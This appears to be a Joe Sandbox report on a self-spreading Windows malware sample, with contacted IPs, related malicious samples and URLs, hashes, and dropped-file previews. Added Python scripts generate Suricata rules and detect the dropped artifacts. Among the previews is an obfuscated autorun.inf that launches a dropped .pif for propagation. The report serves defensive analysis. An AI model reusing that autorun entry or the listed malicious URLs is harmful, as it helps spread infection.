                                                                                                      18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                                                                                      184.44.28.10
                                                                                                      unknownUnited States
                                                                                                      5778CENTURYLINK-LEGACY-EMBARQ-RCMTUSfalse
                                                                                                      150.165.220.74
IP | Domain | Country | ASN | ASN Name | Malicious
(IP cell precedes this excerpt) | unknown | Brazil | 1916 | AssociacaoRedeNacionaldeEnsinoePesquisaBR | false
36.224.135.49 | unknown | Taiwan; Republic of China (ROC) | 3462 | HINETDataCommunicationBusinessGroupTW | false
177.11.161.29 | unknown | Brazil | 52856 | NETWAYPROVEDORDEINTERNETLTDABR | false
188.214.36.212 | unknown | Romania | 50886 | NETFIL-ASBULEVARDULRACOTEANUNR163ARO | false
202.43.114.170 | unknown | Indonesia | 45706 | TGG-AS-IDTeleGlobeGlobalPTID | false
39.1.15.172 | unknown | Taiwan; Republic of China (ROC) | 18182 | SONET-TWSonyNetworkTaiwanLimitedTW | false
113.11.62.14 | unknown | Bangladesh | 7565 | BDCOM-BDRangsNiluSquare5thFloorHouse75Road5AD | false
91.244.214.41 | unknown | Poland | 59607 | TVK-HAJNOWKA-ASPL | false
190.37.212.191 | unknown | Venezuela | 8048 | CANTVServiciosVenezuelaVE | false
84.108.73.183 | unknown | Israel | 8551 | BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL | false
90.179.53.86 | unknown | Czech Republic | 5610 | O2-CZECH-REPUBLICCZ | false
188.241.130.50 | unknown | Romania | 39737 | PRIME-TELECOM-ASRO | false
118.69.52.216 | unknown | Viet Nam | 18403 | FPT-AS-APTheCorporationforFinancingPromotingTechnolo | false
92.87.229.53 | unknown | Romania | 9050 | RTDBucharestRomaniaRO | false
37.142.67.58 | unknown | Israel | 12849 | HOTNET-ILAMS-IXAdminLANIL | false
180.151.8.178 | unknown | India | 10029 | SHYAMSPECTRA-ASSHYAMSPECTRAPVTLTDIN | false
122.168.100.184 | unknown | India | 24560 | AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServices | false
189.13.136.81 | unknown | Brazil | 7738 | TelemarNorteLesteSABR | false
89.122.185.62 | unknown | Romania | 9050 | RTDBucharestRomaniaRO | false
203.146.109.163 | unknown | Thailand | 4750 | CSLOXINFO-AS-APCSLOXINFOPUBLICCOMPANYLIMITEDTH | false
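The contacted-IP table above arrives as flattened text (three lines per row: the IP, the Domain cell fused to the Country cell, and the ASN number fused to the ASN name and the Malicious flag), which is awkward to turn into indicators by hand. The following parser is an added example written for this page; it is not Joe Sandbox code. It assumes every Domain cell reads "unknown" (true for every row shown here) and that the Malicious flag is always the literal "true" or "false"; rows that do not fit that shape raise an error instead of being split on a guess. The three input rows are copied from the table above. Note that the Malicious column is false for every contacted IP in this report, so the rule generator deliberately ignores that flag and emits one Suricata alert per contacted address.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List

# Three rows copied verbatim from the flattened "Contacted IPs" table of this
# report. Each table row is three text lines: the IP, then "unknown" + Country,
# then ASN number + ASN name + Malicious flag run together.
REPORT_ROWS = """
36.224.135.49
unknownTaiwan; Republic of China (ROC)
3462HINETDataCommunicationBusinessGroupTWfalse
177.11.161.29
unknownBrazil
52856NETWAYPROVEDORDEINTERNETLTDABRfalse
118.69.52.216
unknownViet Nam
18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
"""

# Assumption: the Domain cell is "unknown" in every row of this report. A
# resolved domain would have no delimiter before the country name, so such a
# row is rejected rather than split on a guess.
DOMAIN_COUNTRY_RE = re.compile(r"^unknown(.+)$")
# ASN number is the leading digit run, the Malicious flag is the trailing
# "true"/"false"; whatever sits between is the (possibly truncated) ASN name.
ASN_RE = re.compile(r"^(\d+)(.*?)(true|false)$")


@dataclass(frozen=True)
class Contact:
    ip: str
    country: str
    asn: int
    asn_name: str
    malicious: bool


def parse_contacts(text: str) -> List[Contact]:
    """Parse flattened Contacted-IPs rows into Contact records.

    Raises ValueError on any row that does not match the expected three-line
    shape, so a misaligned table can never silently mis-assign cells."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 3:
        raise ValueError(f"expected rows of 3 lines, got {len(lines)} lines")
    contacts = []
    for ip_line, dc_line, asn_line in zip(lines[0::3], lines[1::3], lines[2::3]):
        # IPv4Address() raises ValueError on anything that is not a dotted quad,
        # which catches a table that is offset by one or two lines.
        ip = str(ipaddress.IPv4Address(ip_line))
        dc = DOMAIN_COUNTRY_RE.match(dc_line)
        asn = ASN_RE.match(asn_line)
        if not dc or not asn:
            raise ValueError(f"unparseable row for {ip}: {dc_line!r} / {asn_line!r}")
        contacts.append(Contact(
            ip=ip,
            country=dc.group(1),
            asn=int(asn.group(1)),
            asn_name=asn.group(2),
            malicious=asn.group(3) == "true",
        ))
    return contacts


def to_suricata(contacts: List[Contact], base_sid: int) -> List[str]:
    """Emit one alert rule per contacted IP, in report order, regardless of the
    report's Malicious flag. SIDs are assigned consecutively from base_sid
    (9000001 below is an arbitrary local-rule range, not a published SID)."""
    rules = []
    for n, c in enumerate(contacts):
        rules.append(
            f'alert ip $HOME_NET any -> {c.ip} any '
            f'(msg:"Outbound contact to {c.ip} (AS{c.asn} {c.asn_name}), '
            f'seen in Joe Sandbox analysis 1563008"; sid:{base_sid + n}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    for rule in to_suricata(parse_contacts(REPORT_ROWS), 9000001):
        print(rule)
```

Feeding the full table to parse_contacts() instead of the three sample rows works as long as the first row (whose IP cell lies outside this excerpt) is dropped first; otherwise the IPv4Address check rejects the input, which is the intended behaviour.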
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1563008
Start date and time: 2024-11-26 11:41:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 35
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RHxJqGoGFB.exe (renamed because the original name is a hash value)
Original Sample Name: 2e6402a52ca73f3390ee4f703a1f509a3f2e05220034b1b36c013a083a1222bd.exe
Detection: MAL
Classification: mal100.spre.evad.winEXE@4/7@0/100
EGA Information:
• Successful, ratio: 11.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 70
• Number of non-executed functions: 44
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.126.53.19, 20.190.181.0, 20.190.181.1, 20.190.181.6, 40.126.53.14, 40.126.53.11, 20.231.128.65, 40.126.53.21
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 2336 because it is empty
• Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 2564 because it is empty
• Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 3604 because it is empty
• Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 3632 because it is empty
• Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 5100 because it is empty
• Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 5296 because it is empty
• Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 5728 because it is empty
• Execution Graph export aborted for target kgTxkwCMEtRJHvgbWwUB.exe, PID 5984 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetValueKey calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• VT rate limit hit for: RHxJqGoGFB.exe
Time | Type | Description
05:42:03 | API Interceptor | 3160880x Sleep call for process: RHxJqGoGFB.exe modified
05:43:00 | API Interceptor | 1573x Sleep call for process: explorer.exe modified
05:43:08 | API Interceptor | 745268x Sleep call for process: kgTxkwCMEtRJHvgbWwUB.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
59.9.134.51 | zITHhYdak5.exe | malicious | Sality | (none)
86.104.74.51 | uniswap-sniper-bot-with-gui Setup 1.0.0.exe | malicious | Unknown | 86.104.74.51:1224/keys
86.104.74.51 | uniswap-sniper-bot-with-gui Setup 1.0.0.exe | malicious | Unknown | 86.104.74.51:1224/pdown
118.102.149.168 | r1kArkKGjW.exe | malicious | Sality | (none)
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CANTVServiciosVenezuelaVE | fbot.arm.elf | malicious | Mirai, Moobot | 201.248.15.125
CANTVServiciosVenezuelaVE | loligang.arm7.elf | malicious | Mirai | 201.249.153.62
CANTVServiciosVenezuelaVE | loligang.arm.elf | malicious | Mirai | 201.249.141.84
CANTVServiciosVenezuelaVE | apep.m68k.elf | malicious | Unknown | 186.95.232.130
CANTVServiciosVenezuelaVE | mipsel.nn.elf | malicious | Mirai, Okiru | 190.73.110.19
CANTVServiciosVenezuelaVE | m68k.elf | malicious | Mirai, Moobot | 190.203.171.2
CANTVServiciosVenezuelaVE | x86.elf | malicious | Unknown | 186.88.222.208
CANTVServiciosVenezuelaVE | i486.elf | malicious | Mirai | 186.90.24.230
CANTVServiciosVenezuelaVE | spc.elf | malicious | Mirai | 186.91.98.121
CANTVServiciosVenezuelaVE | owari.sh4.elf | malicious | Unknown | 201.249.189.53
SKATTV-ASBG | yVVZdG2NJX.exe | malicious | GuLoader | 87.121.86.8
SKATTV-ASBG | https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub | malicious | Unknown | 87.121.86.72
SKATTV-ASBG | http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkve | malicious | Unknown | 87.121.86.72
SKATTV-ASBG | [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.eml | malicious | Unknown | 87.121.86.72
SKATTV-ASBG | o4QEzeCniw.exe | malicious | Unknown | 87.120.237.130
SKATTV-ASBG | Payment Order #00004647.exe | malicious | XWorm | 87.121.86.8
SKATTV-ASBG | https://www.google.pl/url?url=http://msulrmrdjzsckgcdargfhi.com&nbq=tspwcyd&idbzok=wua&nbnak=ambmgo&lwf=vngmsem&q=amp/jdsra7r.ldn%C2%ADf%C2%ADpwlywydkjq%C2%ADuh%C2%ADf%C2%ADx%C2%AD.com/ufpd3kprb&xssr=zrcbvya&bhrswcv=abqvczic&clvu=wotwqzi&umasmoc=lhibfmio&tgek=sdcrupi&bpcjeel=qvmnlgnn&eign=czorcvw&txcfkja=lhtluzhk&zkmb=joyrkbk&mspp=frbfplx&ohrxtnn=emgsiphv&cbqf=eyyxrom&ngreupz=nzdjgaue&xtpz=fvqzpcq&spvwwuv=vijpphwi&wrjj=pklwpte&uuahvww=saaddjqz | malicious | Unknown | 87.121.86.72
SKATTV-ASBG | tfSYi9zABT.exe | malicious | Quasar | 87.121.86.32
SKATTV-ASBG | file.exe | malicious | Clipboard Hijacker, Cryptbot | 94.156.116.236
SKATTV-ASBG | https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAg | malicious | Unknown | 87.121.86.72
ONNET-AS-OWNMK | 7aodVUk6TV.elf | malicious | Mirai, Okiru | 79.126.150.219
ONNET-AS-OWNMK | SzEvaEcbe3.elf | malicious | Unknown | 79.126.197.53
ONNET-AS-OWNMK | DCwYFBy6z7.elf | malicious | Mirai, Moobot | 217.16.70.151
ONNET-AS-OWNMK | pk5zYdkgga.elf | malicious | Mirai, Moobot | 79.126.175.197
ONNET-AS-OWNMK | NV7VTiMkEA.elf | malicious | Mirai, Moobot | 31.11.75.8
ONNET-AS-OWNMK | L6i3RnSvpp.elf | malicious | Mirai, Gafgyt, Okiru | 79.126.185.93
ONNET-AS-OWNMK | la.bot.arm.elf | malicious | Unknown | 79.126.175.183
ONNET-AS-OWNMK | qJNrNXMSir.elf | malicious | Mirai | 89.31.154.254
ONNET-AS-OWNMK | 7n89nEPSkV.elf | malicious | Mirai, Gafgyt | 89.31.154.226
ONNET-AS-OWNMK | V1J7GFIwfY.elf | malicious | Mirai, Okiru | 79.126.185.93
No context
No context
Process: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 16384
Entropy (8bit): 1.8879452422736906
Encrypted: false
SSDEEP: 96:QJ93eOIuvE6OtBqxYrHYL0vxZ244SSP2Kxkxc:E9OOZvE6OtISrjOHF
MD5: B1CD9C7F98E2272954BD7AFBBE9A95DE
SHA1: 88DD3DED5D71DFB6C3CA7D7BBD33BE8F6ABC8EF3
SHA-256: D2D5FCE279D89753539645DD6C979390130A7680C8D9BE498598302311093E18
SHA-512: DFD2D6B3AE74D2CE8BB8C6F2CC28F89A50DE19F72F9DA5C712EB4765A3B427D5779351B771B8E29A7DDE310682047702A6200280048ABDD2A39C380447757CA5
Malicious: false
Preview: regf........b.Q.7.................. ....0......1.h.2.t.x.y.e.w.y.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmn....?..............................................................................................................................................................................................................................................................................................................................................8.y@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 32768
Entropy (8bit): 1.4935352093671561
Encrypted: false
SSDEEP: 96:LJ8gN3eOIuvE6OtBqxYrHYL0vxZ244SSP2KxkxeEZ63XQuvE6OtBqxYrHYt:N8gNOOZvE6OtISrjOHbq6HxvE6OtIS
MD5: 673E944815FA15C1F4C691682262F054
SHA1: 36F3738428D80CB345AF031A6CCA9F5F64C6327C
SHA-256: 0B8C4E325051FAADC58C2F4B624546A44668CD37260F00CFEA54E1EC0F82F983
SHA-512: 854A46BABA361311947A20FA4F8A9FB7B62D34F502E644D3B68F8BCD18310D7A8FCCD1F0B3D37BF09813D1928C67B4469D4053736DF9B2AD034A3CD849ACED6B
Malicious: false
Preview: regf........b.Q.7.................. ....0......1.h.2.t.x.y.e.w.y.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtmn....?..............................................................................................................................................................................................................................................................................................................................................?.y@HvLE.............0.......p..!.....o..T........hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........PeekBadges..........[.]....^...?.......................V.....ey ........p...sk..x...x.......t.......H...X.............4.........?.......................
Process: C:\Users\user\Desktop\RHxJqGoGFB.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66561
                                                                                                          Entropy (8bit):7.978102284926885
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:kkLX3SApaVFvlkeAnV6I0yv8wBkRbKLtsIF8qhnA:kKSFvlkeICR2BHF7nA
                                                                                                          MD5:4FF9DB7B690B0CFCB29E3CCE048E7BC8
                                                                                                          SHA1:BC0A8A2C83C605AAC67F4A12DB74D5B22F0C9E21
                                                                                                          SHA-256:5F6B467070EB4AE0B688C16678D1CD331EE7445E32207AEF93408CD162DD2134
                                                                                                          SHA-512:6108C298F570DEFF4CF22864159DFDBA4AF484C13DFB8ABDD614682079AE4478F321CF3965566A3C6058C15FE8E69FA4D7A1FDFC64B5803FA4F277A6134A5735
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................. . ................................................................Z.n..~......U......E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66561
                                                                                                          Entropy (8bit):7.976923591712135
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:7R6HPA0d6EGDXyEMCDMsCDcapreYiML4EThDeQ:7R6A0ODXyv0/yeYnhDeQ
                                                                                                          MD5:115E26E7200846AF126F4752940AA705
                                                                                                          SHA1:7D1F3CCBE259FED0D46CC52A04F0C3BC7D3F6405
                                                                                                          SHA-256:E13E15B1EAF875A7FDA5A4223D38B818C73FF6351C6526C928BAED52A8398984
                                                                                                          SHA-512:781DA9C91EA91CE6F2CDD8ED26AA6EB78E9F9B41E6D384E65B92303A7A7ADD27B9ABC6B7B15818C99AB9F4C854F8CAC0917FBB000C211FEA7FE707CFFBC21BF5
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................... ................................................................].n..~.....W.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:Windows SYSTEM.INI
                                                                                                          Category:dropped
                                                                                                          Size (bytes):255
                                                                                                          Entropy (8bit):5.2790341502364315
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPTy:F4Yv7yk3OUBq82wqFtPm
                                                                                                          MD5:3B542397CE5A0BFBFBBA29C43E4862FA
                                                                                                          SHA1:AEC6431EA677573EE94C05541E0DEF5E38E0760E
                                                                                                          SHA-256:22BA8180B5543937B0428061FC3D931D42E84171655C56F728231D262DAD0B75
                                                                                                          SHA-512:E7B20D5754BFEE417BC8F009E9F2ABE8848807C845C68C18FBE8B829BB4222ADE6BB7AA2FC58AE08FA1418C07C7ED0DF07FBB5848099C3D7C721D1FDC8421136
                                                                                                          Malicious:false
                                                                                                          Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=44775622570..
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:Microsoft Windows Autorun file
                                                                                                          Category:dropped
                                                                                                          Size (bytes):338
                                                                                                          Entropy (8bit):5.573273093294924
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:bLQRo7zusYQZAmppSQwpmK+mAQZ7SmmuiJXM7+SCu0NHSmRMzVwmW:bkRo7z5DYZ2QVSBuiJXsDCxSTzGJ
                                                                                                          MD5:22428B253540DC5B22BE3F5769CD228B
                                                                                                          SHA1:D6F385991EF446F9127A3F9DDAD49A18CC6BDA7B
                                                                                                          SHA-256:CC9F7F724FEFE86D9719A8838E5B9BBACB7E74A907B602233BEEFC53C377B04E
                                                                                                          SHA-512:22F46683B4DF038586EA633F30B8A52A0C73275A787680A760028CA6979C1433A20EA3FF2AFA6AF3158413D2CB1B7753D6F50D2D105B2E36F49008CAB2097450
                                                                                                          Malicious:true
                                                                                                          Preview:[AutoRun]..;WUtkSxoskaeFSrnum CAAR PnxKhn Bpkw..sheLL\opEn\dEfault=1..;iiUwciRycBikUmSITDMqfrhcxbdtFthAdagekVJfnStay BYQqi..opeN = clmaq.pif..;lXFinwqgKxhUClF jcFD ..shell\ExploRe\coMmand =clmaq.pif..;qRNmskpjsMrnUg dWTNubSeEgpCQVhnu fEYeGHCmLdyHcdAtXaj SMchnuisYKfdfuJC ..Shell\OPEn\ComMaNd =clmaq.pif..sHElL\AutopLay\coMmand=clmaq.pif..
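The two small dropped files above are the cheapest host-side indicators in this report: the autorun.inf is written with randomised key casing, junk comment lines between entries and every open/explore/autoplay command pointed at the dropped clmaq.pif, and the system.ini gains a [MCIDRV_VER] section with a DEVICEMB value that the stock "16-bit app support" file does not have. The script below is an added example, not part of the Joe Sandbox report; the two inputs are reconstructed from the previews above (the ".." pairs read as CRLF), and the heuristics (mixed-case detection, the executable-extension list, the junk-comment ratio) are my own choices.

```python
import os
import re
from typing import Dict, List, Tuple

# Extensions that Windows will execute from an autorun "open"/"shell\...\command" value.
EXEC_EXTENSIONS = {".exe", ".com", ".pif", ".scr", ".bat", ".cmd"}
# A lowercase letter followed by an uppercase one inside a word ("sHElL", "opeN") is
# never produced by a legitimate installer; it is the obfuscation seen in the preview.
MIXED_CASE = re.compile(r"[a-z][A-Z]")

# Constructed from the dropped autorun.inf preview on this page.
AUTORUN_INF = r"""[AutoRun]
;WUtkSxoskaeFSrnum CAAR PnxKhn Bpkw
sheLL\opEn\dEfault=1
;iiUwciRycBikUmSITDMqfrhcxbdtFthAdagekVJfnStay BYQqi
opeN = clmaq.pif
;lXFinwqgKxhUClF jcFD
shell\ExploRe\coMmand =clmaq.pif
;qRNmskpjsMrnUg dWTNubSeEgpCQVhnu fEYeGHCmLdyHcdAtXaj SMchnuisYKfdfuJC
Shell\OPEn\ComMaNd =clmaq.pif
sHElL\AutopLay\coMmand=clmaq.pif
"""

# Constructed from the dropped system.ini preview on this page.
SYSTEM_INI = """; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]
[MCIDRV_VER]
DEVICEMB=44775622570
"""


def parse_ini(text: str) -> Tuple[Dict[str, List[Tuple[str, str]]], Dict[str, int]]:
    """Tolerant INI walk: section names lower-cased, keys kept verbatim so their
    casing can be inspected, comment lines counted per section instead of dropped."""
    sections: Dict[str, List[Tuple[str, str]]] = {}
    comments: Dict[str, int] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if line.startswith(";"):
            comments[current] = comments.get(current, 0) + 1
            continue
        key, _, value = line.partition("=")
        sections.setdefault(current, []).append((key.strip(), value.strip()))
    return sections, comments


def check_autorun(text: str) -> List[str]:
    """Flag autorun.inf entries that launch an executable and look machine-obfuscated."""
    sections, comments = parse_ini(text)
    entries = sections.get("autorun", [])
    findings: List[str] = []
    targets = set()
    for key, value in entries:
        k = key.lower()
        ext = os.path.splitext(value.lower())[1]
        if (k == "open" or k.startswith("shell\\")) and ext in EXEC_EXTENSIONS:
            targets.add(value)
        if MIXED_CASE.search(key):
            findings.append(f"obfuscated key casing: {key}")
    if targets:
        findings.append("launch targets: " + ", ".join(sorted(targets)))
    n_comments = comments.get("autorun", 0)
    if n_comments and n_comments >= len(entries) // 2:
        findings.append(f"{n_comments} junk comment lines interleaved with {len(entries)} entries")
    return findings


def check_system_ini(text: str) -> List[str]:
    """Report the [MCIDRV_VER] DEVICEMB marker this sample wrote into system.ini."""
    sections, _ = parse_ini(text)
    return [f"[MCIDRV_VER] DEVICEMB={value} (not present in a stock system.ini)"
            for key, value in sections.get("mcidrv_ver", []) if key.lower() == "devicemb"]


if __name__ == "__main__":
    for line in check_autorun(AUTORUN_INF) + check_system_ini(SYSTEM_INI):
        print(line)
```

Two caveats when turning this into a hunt: the executable name (clmaq.pif here) and the DEVICEMB number are per-infection values, so match on the structure (obfuscated keys, every command pointing at one root-level .pif/.exe, a DEVICEMB key at all) rather than on the literals; and AutoRun from removable USB media has been disabled since Windows 7, so the autorun.inf is a propagation artifact to sweep shares and removable drives for, not a guaranteed execution path on a patched host.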
                                                                                                          Process:C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:modified
                                                                                                          Size (bytes):99328
                                                                                                          Entropy (8bit):7.9742065590857205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:7R6HPA0d6EGDXyEMCDMsCDcapreYiML4EThDeVfJgX/cBvJeD6w:7R6A0ODXyv0/yeYnhDexy/c5J/w
                                                                                                          MD5:FB2A7CE9B3AF61C819495A075CF6FDC4
                                                                                                          SHA1:42A6618175EB54AC179BD669C93D785F0DDAE994
                                                                                                          SHA-256:CF2237015DA36DF32AC5ECAB94B7A3A415FAFAE7CD56ED8EFA1C72D8581EF26F
                                                                                                          SHA-512:A9135510F0EAE6C2A25DCF01C236ED62E585CD3473CA02E7070882C0F00129026013C011BE35CB38EB701D3C146CC978A6853FE32579613BB686486C762C5FEF
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
